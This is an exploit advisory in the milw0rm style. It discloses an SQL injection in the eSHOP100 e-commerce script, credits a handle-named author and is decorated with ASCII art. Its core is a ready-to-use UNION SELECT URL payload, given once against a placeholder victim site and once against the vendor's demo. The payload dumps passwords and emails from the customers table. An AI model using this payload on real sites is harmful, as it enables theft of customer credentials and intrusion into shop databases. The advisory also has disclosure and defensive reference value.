| Risk |
Local |
| Remote |
| High |
No |
| Yes |
########################################################################
# #
# ...:::::eSHOP100 SQL Injection Vulnerbility ::::.... #
########################################################################
## AUTHOR : JuDge
## AUTHOR Email:spamm3r@windowslive.com,eslamwaheed50@hotmail.com
## Script WebSite:http://www.eshop100.co.uk
##Dork::)
##DescRipTiON: pull customers info from database
##EXPLOITS:
www.victim.com/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16
,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*
##Demo:http://www.eshop100.co.uk/demo/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8
,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*
========================================================================================================================
=========o======
## thx to : All My FrienDs
i'm Not a HaCker
- ) \ $$$$$$$$$$$$####. $$$$$$###" "###$$$$$$$$$ s'
- ( ) $$$$$$$$$$$$$####. $$$$$###" ####$$$$$$$$s$$' )
- (( $$$$$$$$$$$##### $$$$$$$$###" "####$$$$$$$$$$
- ) \ $$$$$$$$$$$$####. $$$$$$###" "###$$$$$$$$$ s'
- ( ) $$$$$$$$$$$$$####. $$$$$###" ####$$$$$$$$s$$'
- ) ( ( $$"$$$$$$$$$$$#####.$$$$$###' JuDge Da .###$$$$$$$$$$"
- ( ) ) _,$" $$$$$$$$$$$$######.$$##' BeST .###$$$$$$$$$$
- ) ( ( \. "$$$$$$$$$$$$$#######,,,. ..####$$$$$$$$$$$"
- ( )$ ) ) ,$$$$$$$$$$$$$$$$$$####################$$$$$$$$$$$"
- ( ($$ ( \ _sS" `"$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$S$$,
- ) )$$$s ) ) . . `$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$"' `$$
- ( $$$Ss/ .$, .$,,s$$$$$$##S$$$$$$$$$$$$$$$$$$$$$$$$S"" '
- \)_$$$$$$$$$$$$$$$$$$$$$$$##" $$ `$$. `$$.
- `"S$$$$$$$$$$$$$$$$$#" $ `$ `$
- `"""""""""""""' ' '
'
References:
http://www.milw0rm.com/exploits/5970
http://secunia.com/advisories/30712
[ ASCII VERSION ]
|
Topic: